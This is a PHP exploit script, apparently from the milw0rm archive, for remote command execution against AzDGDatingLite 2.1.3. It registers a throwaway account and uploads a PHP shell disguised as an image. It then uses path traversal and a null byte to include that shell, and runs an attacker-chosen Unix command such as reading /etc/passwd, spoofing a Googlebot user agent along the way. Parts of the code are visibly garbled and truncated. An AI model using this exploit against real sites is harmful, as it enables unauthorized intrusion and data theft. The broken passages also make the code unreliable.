AzDGDatingLi te V 2.1.3 (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /azdg/ or just /)

specify a port other than 80 (default value)

a Unix command , example: ls -la to list directories, cat /etc/passwd to show passwd file

send exploit through an HTTP proxy (ip:por t
'; function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} # step 1 -> register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here... $data='-----------------------------23281168279961 Content-Disposition: form-data; name="l" default -----------------------------23281168279961 Content-Disposition: form-data; name="a" a -----------------------------23281168279961 Content-Disposition: form-data; name="fname" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="lname" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="pass" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="rpass" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="month" 11 -----------------------------23281168279961 Content-Disposition: form-data; name="day" 27 -----------------------------23281168279961 Content-Disposition: form-data; name="year" 1942 -----------------------------23281168279961 Content-Disposition: form-data; name="gender" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="purpose" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="country" 158 -----------------------------23281168279961 Content-Disposition: form-data; name="email" jimihendrix'.$anumber.'@hotmail.com -----------------------------23281168279961 Content-Disposition: form-data; name="url" -----------------------------23281168279961 Content-Disposition: form-data; name="icq" -----------------------------23281168279961 Content-Disposition: form-data; name="aim" -----------------------------23281168279961 Content-Disposition: form-data; name="phone" -----------------------------23281168279961 Content-Disposition: form-data; name="city" -----------------------------23281168279961 Content-Disposition: form-data; name="marstat" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="child" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="height" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="weight" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="hcolor" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="ecolor" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="etnicity" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="religion" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="smoke" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="drink" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="education" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="job" -----------------------------23281168279961 Content-Disposition: form-data; name="hobby" -----------------------------23281168279961 Content-Disposition: form-data; name="descr" rock star -----------------------------23281168279961 Content-Disposition: form-data; name="sgender" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="setnicity" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="sreligion" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="agef" 14 -----------------------------23281168279961 Content-Disposition: form-data; name="aget" 60 -----------------------------23281168279961 Content-Disposition: form-data; name="heightf" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="heightt" 22 -----------------------------23281168279961 Content-Disposition: form-data; name="weightf" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="weightt" 45 -----------------------------23281168279961 Content-Disposition: form-data; name="hdyfu" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="file0"; filename="jimihendrix.gif" Content-Type: image/jpeg '; $shell=' README'."'".'); ?>'; $data.=$shell; $data.=' -----------------------------23281168279961 Content-Disposition: form-data; name="file1"; filename="" Content-Type: application/octet-stream -----------------------------23281168279961 Content-Disposition: form-data; name="file2"; filename="" Content-Type: application/octet-stream -----------------------------23281168279961--'; if ($proxy=='') {$packet="POST ".$path."/add.php HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path."add.php HTTP/1.1\r\n";} $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n"; $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Language: en-us,en;q=0.5\r\n"; $packet.="Accept-Encoding: gzip,deflate\r\n"; $packet.="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet.="Connection: close\r\n"; $packet.="Referer: http://".$host.$path."add.php?l=default\r\n"; $packet.="Cookie: PHPSESSID=13798fab78f7fa6e5bb501ac83329bdd\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------23281168279961\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); #step 2 -> retrieve upload subdir name and filename from index e profile page if ($proxy=='') {$packet="GET ".$path." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp='';$i=0; while (!eregi('jimihendrix'.$anumber,$temp)) { $temp.=$html[$i]; $i=$i+1; if (eregi('',$temp)) { die(" Exploit failed... ");} } $temp2=explode('retrieving shell path from /'.$profile.'

'; if ($proxy=='') {$packet="GET ".$path.$profile." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path.$profile." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp='';$i=0; while (!eregi('jimihendrix'.$anumber,$temp)) { $temp.=$html[$i]; $i=$i+1; if (eregi('',$temp)) { die(" Exploit failed... ");} } $temp2=explode('Ok,found... shell is at '.$shellfullpath.'

'; $temp=explode("/",$shellfullpath); $temp2=count($temp)-1; $subdir=$temp[$temp2-1]; $filename=$temp[$temp2]; # step 3 -> launch commands if ($proxy=='') {$packet="GET ".$path."include/security.inc.php?cmd=".urlencode($command)."&l=".urlencode("../../../members/uploads/".$subdir."/".$filename.chr(0x00))." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."include/security.inc.php?cmd=".urlencode($command)."&l=".urlencode("../../../members/uploads/".$subdir."/".$filename.chr(0x00))." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); # step 4 -> making a GET request for redirected output echo '
if AzDGDatingLite is unpatched and vulnerable now you will see '.htmlentities($command).'output...

'; if ($proxy=='') {$packet="GET ".$path."include/README HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."include/README HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); } ?> # milw0rm.com [2005-09-13]